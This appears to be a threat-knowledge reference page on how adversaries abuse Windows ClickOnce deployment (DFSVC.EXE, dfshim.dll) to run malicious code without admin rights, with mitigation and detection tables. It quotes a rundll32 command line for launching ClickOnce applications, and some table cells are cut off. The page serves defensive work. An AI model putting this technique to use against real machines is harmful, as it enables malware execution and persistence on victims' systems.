Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.[1] ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.[2]
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.[3] As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on User Execution. When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.[4]
Adversaries may also abuse ClickOnce to execute malware via a Rundll32 script using the command rundll32.exe dfshim.dll,ShOpenVerbApplication1
.[5]
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., Registry Run Keys / Startup Folder).[1][6]
ID | Mitigation | Description |
---|---|---|
M1045 | Code Signing |
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.[7] |
M1042 | Disable or Remove Feature or Program |
Disable ClickOnce installations from the internet using the following registry key: ClickOnce may not be necessary within an environment and should be disabled if not being used. |
M1021 | Restrict Web-Based Content |
Disable ClickOnce installations from the internet using the following registry key: |
ID | Data Source | Data Component | Detects |
---|---|---|---|
DS0017 | Command | Command Execution |
When executed from the command line, rundll32 is used to call the ClickOnce API functions (ex: |
DS0011 | Module | Module Load |
Monitor dfsvc.exe child process activity with unsigned module loads, as well as activity associated with dfshim.dll. Compare with baseline of ClickOne activity to whitelist applications with valid business use-cases.[2] |
DS0009 | Process | Process Creation |
Monitor for newly executed child processes of dfsvc.exe that may be indicative of malicious ClickOnce applications. |
Process Metadata |
Evaluate Event Tracing for Windows (ETW) telemetry associated with ClickOnce deployment execution. |